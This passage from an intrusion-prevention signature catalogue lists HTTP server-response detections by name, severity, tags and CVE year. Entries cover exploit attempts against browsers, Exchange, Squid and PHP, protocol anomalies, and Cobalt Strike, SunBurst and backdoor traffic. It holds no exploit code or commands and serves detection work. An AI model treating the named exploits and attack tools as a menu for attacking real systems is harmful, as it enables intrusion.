About this situation: Microsoft IIS 7.x server header
Context: HTTP Reply Header Line
Severity: 1
Tags: Windows, Any Hardware, IIS, Windows not specific, IIS not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-336-4219
Vulnerability: Microsoft-IIS-7.x-Server-Header
Description:
Back to top

HTTP_SHS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-10, CVE2009, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-716-5211
Vulnerability: Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
Description:
Back to top

HTTP_SHS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Redirect-Memory-Corruption
Description:
Back to top

HTTP_SHS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass

About this situation: An attempt to exploit a security bypass vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-06, CVE2010, Windows not specific, Internet Explorer not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
Description:
Back to top

HTTP_SHS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029

About this situation: A maliciously named ppt file detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Windows not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
Description:
Back to top

HTTP_SHS-Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Outlook Express detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook Express, Windows Mail, MS2008-08, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability
Description:
Back to top

HTTP_SHS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-3

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
Description:
Back to top

HTTP_SHS-Microsoft-Windows-Shell-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2004-07, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Windows-Shell-Vulnerability
Description:
Back to top

HTTP_SHS-Microsoft-Windows-Windows-Script-Host-Command-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Microsoft-Windows-Windows-Script-Host-Command-Injection
Description:
Back to top

HTTP_SHS-Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1342-5242
Last changed: sgpkg-ips-1342-5242
Vulnerability: Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480
Description:
Back to top

HTTP_SHS-mIRC-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in mIRC detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, mIRC, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: mIRC-URI-Handler-Remote-Code-Execution
Description:
Back to top

HTTP_SHS-Mozilla-Multiple-Products-Multiple-Location-Headers

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1284-5242
Vulnerability: Mozilla-Multiple-Products-Multiple-Location-Headers
Description:
Back to top

HTTP_SHS-Multiple-Content-Encodings

About this situation: Multiple content encodings detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-639-5211
Description:
Back to top

HTTP_SHS-Multiple-Gzip-Or-Deflate-Content-Encodings

About this situation: Multiple GZip or Deflate content encodings in a HTTP response detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-645-5211
Vulnerability: HTTP-Multiple-Content-Encodings
Description:
Back to top

HTTP_SHS-Multiple-Transfer-Encodings

About this situation: Multiple transfer encodings detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-639-5211
Description:
Back to top

HTTP_SHS-No-Newline-Before-Content-Encoding

About this situation: No newline before a Content-Encoding header
Context: HTTP Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Description:
Back to top

HTTP_SHS-Non-Alphanumeric-Content-Encoding

About this situation: Invalid character in HTTP header
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Description:
Back to top

HTTP_SHS-Non-Alphanumeric-Content-Type

About this situation: Invalid character in HTTP header
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-793-5211
Description:
Back to top

HTTP_SHS-NTLM-Authentication-Usage

About this situation: Detects the usage of NTLM authentication
Context: HTTP Reply Header Line
Severity: 1
Tags: Windows, Any Hardware, MS2009-04, CVE2009, Windows not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-356-4219
Vulnerability: HTTP_Microsoft-HTTP-Services-Authentication-Reflection
Description:
Back to top

HTTP_SHS-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Winamp
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, x86, Winamp, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-405-4219
Vulnerability: HTTP-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow
Description:
Back to top

HTTP_SHS-OPC-UA-HTTP/XML-Shared-Variables

About this situation: This fingerprint sets shared variables for OPC UA HTTP/XML - do not disable
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

HTTP_SHS-Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Oracle Java SE detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java SE, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
Description:
Back to top

HTTP_SHS-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle JDeveloper detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle JDeveloper, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
Description:
Back to top

HTTP_SHS-Oracle-WebLogic-Server-Session-Fixation

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: Oracle-WebLogic-Server-Session-Fixation
Description:
Back to top

HTTP_SHS-PHP-apache_request_headers-Function-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the PHP apache_request_headers function detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, PHP, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-656-5211
Vulnerability: PHP-apache_request_headers-Function-Buffer-Overflow
Description:
Back to top

HTTP_SHS-PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2018, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1070-5242
Vulnerability: PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Possible-Cobalt-Strike-Response

About this situation: A possible response of Cobalt Strike's server was detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Possible-Cobalt-Strike-Response
Description:
Back to top

HTTP_SHS-Possibly-Malicious-Long-Domain-Name-Redirect

About this situation: HTTP redirect to an unusually long domain name with suspicious characteristics
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-795-5211
Last changed: sgpkg-ips-795-5211
Vulnerability: Long-Domain-Name-Redirect
Description:
Back to top

HTTP_SHS-Redirect-To-File-URI

About this situation: Redirect to a file URI detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows 7, Any Hardware, Generic HTTP client, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: Microsoft-Ntlm-Authentication-After-HTTP-Redirect
Description:
Back to top

HTTP_SHS-Redirect-To-FTP

About this situation: This situation detects a redirection to an FTP address.
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Description:
Back to top

HTTP_SHS-Redirect-To-UNC-Path

About this situation: Detected a redirection to an UNC path
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Description:
Back to top

HTTP_SHS-Response-HTTP-2

About this situation: A HTTP2 response detected
Context: HTTP Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1144-5242
Description:
Back to top

HTTP_SHS-Server-Version-Number-Disclosure

About this situation: A version number was detected in HTTP server reply header
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Server-Version-Number-Disclosure
Description:
Back to top

HTTP_SHS-Set-Browser-Cookie

About this situation: Detected an attempt to set a browser cookie
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-482-5211
Last changed: sgpkg-ips-487-5211
Description:
Back to top

HTTP_SHS-Set-Cookie2-Header

About this situation: A suspicious http response was detected
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1519-5242
Description:
Back to top

HTTP_SHS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1837-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_SHS-Shared-Variables-2

About this situation: This fingerprint sets shared variables
Context: HTTP Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_SHS-SHOUTcast-Stream-Usage

About this situation: Detects SHOUTcast stream usage
Context: HTTP Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Streaming Protocols
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-793-5211
Vulnerability: SHOUTcast-Stream-Usage
Description:
Back to top

HTTP_SHS-Solarwinds-SunBurst-Beacon

About this situation: Beacon traffic of the Solarwinds SunBurst intrusion
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

HTTP_SHS-Squid-Long-String-Header-Processing-Assertion-Failure

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1403-5242
Vulnerability: Squid-Long-String-Header-Processing-Assertion-Failure
Description:
Back to top

HTTP_SHS-Squid-Proxy-Cache-Update-DoS

About this situation: An attempt to exploit a Squid Proxy Cache Update DoS Vulnerability detected.
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2007, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-680-5211
Last changed: sgpkg-ips-680-5211
Vulnerability: Squid-Proxy-Cache-Update-DoS
Description:
Back to top

HTTP_SHS-Squid-Proxy-HTTP-Vary-Header-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: Squid-Proxy-HTTP-Vary-Header-Handling-Denial-Of-Service
Description:
Back to top

HTTP_SHS-Strict-Transport-Security-Header

About this situation: HTTP Strict Transport Security header detected
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Description:
Back to top

HTTP_SHS-Sundown-Malware-Activity

About this situation: Sundown activity detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-793-5211
Vulnerability: Sundown-Malware
Description:
Back to top

HTTP_SHS-Suspicious-Multiline-HTTP-Header

About this situation: Suspicious multi-line HTTP server header detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-783-5211
Last changed: sgpkg-ips-783-5211
Vulnerability: Suspicious-Multiline-HTTP-Header
Description:
Back to top

HTTP_SHS-Suspicious-Partial-Data-Request-From-Server

About this situation: A suspicious http response was detected
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Description:
Back to top

HTTP_SHS-Suspicious-Reply

About this situation: A suspicious HTTP reply was detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-09, CVE2016, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-3325-Information-Disclosure
Description:
Back to top

HTTP_SHS-Suspicious-Server-Reply

About this situation: Detected a suspicious server reply
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_SHS-Suspiciously-Long-Reply-Content-Length-Header

About this situation: A suspiciously long Content-Length header seen in a HTTP Reply
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Opera-Browser-Content-Length-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Suspiciously-Long-Reply-Header

About this situation: A suspiciously long HTTP reply header was detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, cURL, Squid, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1352-5242
Vulnerability: Squid-Oversized-Reply-Header-Handling-Vulnerability
Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545
Description:
Back to top

HTTP_SHS-TA551-Malware-Infection-Traffic_2

About this situation: TA551 malware infection traffic detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: TA551-Shathak-Malware-Infection-Traffic_2
Description:
Back to top

HTTP_SHS-Tinyproxy-HTTP-Connection-Headers-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Tinyproxy detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Linux, Any Hardware, Tinyproxy, CVE2023, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1747-5242
Last changed: sgpkg-ips-1747-5242
Vulnerability: Tinyproxy-HTTP-Connection-Headers-Use-After-Free
Description:
Back to top

HTTP_SHS-Tnftp-Redirection-Command-Execution-CVE-2014-8517

About this situation: A vulnerability in tnftp
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Tnftp, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1867-5242
Vulnerability: Tnftp-Redirection-Command-Execution-CVE-2014-8517
Description:
Back to top

HTTP_SHS-Transfer-Encoding-Chunked

About this situation: Deflate transfer encoding detected
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-719-5211
Description:
Back to top

HTTP_SHS-Transfer-Encoding-Compress

About this situation: Compress transfer encoding detected
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-719-5211
Description:
Back to top

HTTP_SHS-Transfer-Encoding-Deflate

About this situation: Deflate transfer encoding detected
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-719-5211
Description:
Back to top

HTTP_SHS-Transfer-Encoding-Gzip

About this situation: Gzip transfer encoding detected
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-719-5211
Description:
Back to top

HTTP_SHS-Transfer-Encoding-Identity

About this situation: Identity transfer encoding detected
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-719-5211
Description:
Back to top

HTTP_SHS-Transfer-Encoding-Invalid

About this situation: Unknown transfer encoding detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-720-5211
Description:
Back to top

HTTP_SHS-Transfer-Encoding-lzma

About this situation: Lzma content encoding detected
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-846-5242
Last changed: sgpkg-ips-846-5242
Description:
Back to top

HTTP_SHS-Transfer-Encoding-With-Obsolete-Header-Folding

About this situation: A HTTP server reply using obsolete Header Folding was seen
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Description:
Back to top

HTTP_SHS-Unrequested-Partial-Content

About this situation: Detected partial content in server respone without the client asking for it
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Description:
Back to top

HTTP_SHS-Vulnerable-Php-4.3.7

About this situation: PHP less or equal to 4.3.7
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, PHP, CVE2004, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-483-5211
Vulnerability: Php-Memory-Limit-Code-Execution-Vulnerability
Description:
Back to top

HTTP_SHS-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow

About this situation: Detects HTTP responses with a large Realm field, which may overflow a buffer in Watchfire Appscan
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Watchfire Appscan, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-407-4219
Vulnerability: HTTP-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Web-Server-CT-Backdoor-Response

About this situation: Web Server CT backdoor response
Context: HTTP Server Header Stream
Severity: 10
Tags: Windows, Any Hardware, Web Server CT, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Backdoor-Web-Server-CT
Description:
Back to top

HTTP_SHS-WebSocket-Connection-Reply

About this situation: Server indicated a Websocket connection
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-797-5211
Description:
Back to top

HTTP_SHS-Whitespace-Before-Transfer-Encoding

About this situation: A whitespace character before the Transfer-Encoding line
Context: HTTP Reply Header Line
Severity: 7
